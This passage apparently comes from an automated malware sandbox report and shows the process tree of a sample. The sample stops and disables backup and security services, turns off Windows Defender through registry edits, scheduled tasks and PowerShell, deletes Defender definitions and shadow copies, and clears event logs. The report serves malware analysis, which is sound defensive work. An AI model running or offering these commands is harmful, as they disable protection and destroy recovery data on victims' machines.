- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1060
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:568
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:888
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1604
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:432
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1752
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1532
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1812
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1124
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1364
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1944
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1668
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1744
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1932
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1824
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1400
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:900
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1588
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:888
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:844
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:968
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1200
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1672
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:568
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:624
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:740
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1064
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:984
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1344
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:868
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1244
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1060
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:772
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:896
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:280
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1704
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1392
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1444
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-